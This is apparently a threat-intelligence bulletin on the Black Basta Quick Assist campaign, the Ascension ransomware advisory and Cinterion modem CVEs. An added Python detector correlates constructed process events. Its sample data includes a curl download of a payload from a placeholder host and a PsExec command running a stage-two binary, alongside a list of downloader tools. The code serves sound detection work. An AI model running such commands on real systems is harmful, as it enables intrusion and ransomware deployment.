Ransomware/Malware Activity
New Social Engineering Campaign Using Email Spam Linked to Black Basta
Cybersecurity teams at Rapid7 and Microsoft have identified an ongoing social engineering campaign that leverages Microsoft's built-in Quick Assist feature to gain remote access to victims' desktops. Threat actors effectively launch the attack with the email addresses of only one or more employees of the target organization.
Attackers subscribe the email address to numerous mailing lists, inundating the recipient with an overwhelming volume of unsolicited emails. They then call the victim, posing as the IT team, and offer to install an update to solve the email problem. The attacker instructs the victim to launch Windows' Quick Assist tool to grant them access to the machine. Once the threat actor has access, they run a scripted command to download batch and zip files that deliver malicious payloads. One of the batch scripts is used to harvest the victim's credentials: the victim is prompted to enter them, presented as a requirement to complete the fake update.
Microsoft reports that once the attackers have access to the victim's machine, multiple tools are downloaded including Qakbot, ScreenConnect, and Cobalt Strike. Once the initial tooling is installed, attackers perform domain enumeration and lateral movement before finally using PsExec to deploy Black Basta ransomware.
Black Basta is a Ransomware-as-a-Service operation that is believed to be an offshoot of the Conti cybercrime group. CTIX analysts recommend that organizations consider blocking remote access tools that are not required by policy, and educate employees on how to recognize tech support fraud. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
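As an added example (not from the original bulletin or from the Rapid7 and Microsoft write-ups), the following Python correlates constructed Sysmon-style process-creation events to flag the chain described above: a Quick Assist launch on a host, followed within an assumed 30-minute window by a shell or downloader staging .bat/.zip payloads, and later PsExec on the same host. Host names, timestamps, paths, the URL and the window are constructed assumptions.

```python
"""Correlate constructed Sysmon-style process-creation events (Event ID 1)
to flag the Quick Assist social-engineering chain: Quick Assist launch,
then .bat/.zip payload staging, then PsExec on the same host."""
from datetime import datetime, timedelta
import re

WINDOW = timedelta(minutes=30)  # assumed hunting window after Quick Assist starts
# Downloads of .bat/.zip over HTTP, or batch files run from a user-writable path
PAYLOAD_RE = re.compile(
    r"https?://\S+\.(?:bat|zip)\b|\\Users\\Public\\\S+\.bat\b", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
PSEXEC = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}

# Constructed sample telemetry: (Computer, UtcTime, Image, CommandLine). Hosts,
# times and the URL are invented; example.invalid is a reserved non-routable name.
EVENTS = [
    ("WS-FIN-07", "2024-05-13T09:58:10", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ("WS-FIN-07", "2024-05-13T10:02:41", r"C:\Windows\System32\QuickAssist.exe", "QuickAssist.exe"),
    ("WS-FIN-07", "2024-05-13T10:11:05", r"C:\Windows\System32\curl.exe",
     r"curl -o C:\Users\Public\update.zip http://example.invalid/update.zip"),
    ("WS-FIN-07", "2024-05-13T10:12:30", r"C:\Windows\System32\cmd.exe",
     r"cmd /c C:\Users\Public\update.bat"),
    ("WS-FIN-07", "2024-05-13T11:40:00", r"C:\Users\Public\psexec.exe",
     r"psexec \\DC01 -s cmd /c C:\Users\Public\stage2.exe"),
    ("WS-HR-02", "2024-05-13T10:05:00", r"C:\Windows\System32\QuickAssist.exe", "QuickAssist.exe"),
    ("WS-HR-02", "2024-05-13T10:06:00", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

def image_name(path):
    """Lower-case file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def correlate(events, window=WINDOW):
    """Return (host, rule, command_line) alerts for activity following a Quick Assist launch."""
    parsed = sorted(((h, datetime.fromisoformat(t), image_name(i), c) for h, t, i, c in events),
                    key=lambda e: e[1])
    quick_assist_start = {}  # host -> most recent Quick Assist launch (never expired here)
    alerts = []
    for host, when, name, cmd in parsed:
        if name == "quickassist.exe":
            quick_assist_start[host] = when
            continue
        start = quick_assist_start.get(host)
        if start is None:
            continue  # no remote-assist session seen on this host yet
        if name in SHELLS and PAYLOAD_RE.search(cmd) and when - start <= window:
            alerts.append((host, "payload_staging_after_quick_assist", cmd))
        elif name in PSEXEC:  # lateral movement is flagged regardless of the window
            alerts.append((host, "psexec_after_quick_assist", cmd))
    return alerts

if __name__ == "__main__":
    for host, rule, cmd in correlate(EVENTS):
        print(f"{host}: {rule}: {cmd}")
```

The benign Quick Assist session on WS-HR-02 produces no alert, which is the point of correlating the launch with what follows rather than alerting on the tool alone.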
Threat Actor Activity
Black Basta Joint Advisory Released Days After Attack on Ascension Healthcare Network
Last week, Ascension, a major U.S. healthcare network, experienced clinical operation disruptions and system outages causing them to divert ambulances to unaffected facilities after falling victim to a ransomware attack carried out by the Black Basta ransomware gang.
CISA released a joint advisory a few days later, in collaboration with the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC). The Russian-speaking threat actors typically breach targets via phishing attacks and known vulnerabilities, employing a double-extortion tactic. The group commonly targets private organizations and critical infrastructure entities in North America, Europe, and Australia.
- The joint report notes that Black Basta, a Ransomware-as-a-Service operation that first surfaced in April 2022, has breached over five hundred organizations globally.
- The agencies also reported that the gang has encrypted and stolen data from at least twelve out of the sixteen critical infrastructure sectors while observing a recent acceleration of attacks against the healthcare sector.
- The report states that "Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions."
- The advisory includes tactics, techniques, and procedures (TTPs) used by the threat actors as well as indicators of compromise (IOCs) to better help readers defend against their attacks.
Black Basta was the 12th most active ransomware family in 2023 and has already seen a 41% quarter-over-quarter spike in Q1 2024. CTIX analysts recommend organizations, especially in the healthcare sector, maintain common cyber-hygiene practices, implement security controls such as multi-factor authentication (MFA), and look for ways to recognize and mitigate phishing attempts.
Vulnerabilities
Multiple Security Flaws in Cinterion Cellular Modems
Multiple security flaws in Telit Cinterion cellular modems, which are widely used in communication networks and IoT devices, have recently been disclosed. The vulnerabilities could allow attackers to execute arbitrary code via SMS or access sensitive information. Identifying affected products is complicated, which escalates the risk, because these modems are often integrated into various solutions and paired with products from multiple vendors. The security issues, which were reported to the vendor in February 2023 and later disclosed in November, include CVE-2023-47610 through CVE-2023-47616, along with another issue that has yet to be registered.
The most severe flaw is CVE-2023-47610 (CVSS score: 8.1), a heap overflow in the modem's Secure User Plane Location (SUPL) message handlers that allows unauthenticated remote attackers to execute arbitrary code via SMS messages. The SMS messaging interface is present on all modems, and access is possible if the subscriber number of the target modem in the cellular operator's network is known. Exploiting this vulnerability can give an attacker deep-level access to the modem's operating system, which could facilitate the manipulation of RAM and flash memory.
The other vulnerabilities, while having lower severity scores, could still be exploited to compromise the integrity of MIDlets (Java-based applications running within the modems). This would allow attackers to bypass digital signature checks, enabling the execution of unauthorized code with increased privileges. Although these findings pertain to the Cinterion EHS5-E series modem, the Cinterion BGS5, EHS5/6/7, PDS5/6/8, ELS61/81, and PLS62 modems have similar hardware and software architectures and therefore are also at risk.
To mitigate these issues, CTIX analysts recommend disabling non-essential SMS capabilities for impacted devices and employing securely configured private Access Point Names (APNs).